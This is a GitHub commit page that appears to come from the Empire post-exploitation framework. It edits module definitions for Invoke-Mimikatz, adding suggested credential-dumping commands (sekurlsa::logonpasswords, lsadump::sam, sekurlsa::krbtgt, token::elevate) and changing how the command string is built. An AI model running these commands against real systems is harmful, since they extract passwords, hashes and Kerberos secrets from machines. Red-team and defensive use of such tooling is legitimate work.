Skip to content

Commit

Permalink
Fixed mimikatz command and added suggested values (#194)
Browse files Browse the repository at this point in the history
* fixed mimikatz command and added suggested values

* removed invoke-vnc changes

* added space
  • Loading branch information
Cx01N authored Aug 14, 2021
1 parent 7bc0644 commit 22774f1
Show file tree
Hide file tree
Showing 2 changed files with 10 additions and 2 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -33,5 +33,13 @@ options:
description: Custom Invoke-Mimikatz command to run.
required: true
value: ''
suggested_values:
- sekurlsa::logonpasswords
- sekurlsa::minidump
- privilege::debug sekurlsa::logonpasswords
- token::elevate
- sekurlsa::krbtgt
- lsadump::sam
- kerberos::list
script_path: 'empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1'
script_end: Invoke-Mimikatz -Command "{{ PARAMS }}"
script_end: Invoke-Mimikatz {{ PARAMS }}
Original file line number Diff line number Diff line change
Expand Up @@ -24,4 +24,4 @@ options:
value: ''
script_path: 'empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1'
script_end: |
Invoke-Mimikatz -Command '"privilege::debug" "ts::logonpasswords" "exit"'; {{ PARAMS }}
Invoke-Mimikatz -Command '"privilege::debug" "ts::logonpasswords" "exit"';

0 comments on commit 22774f1

Please sign in to comment.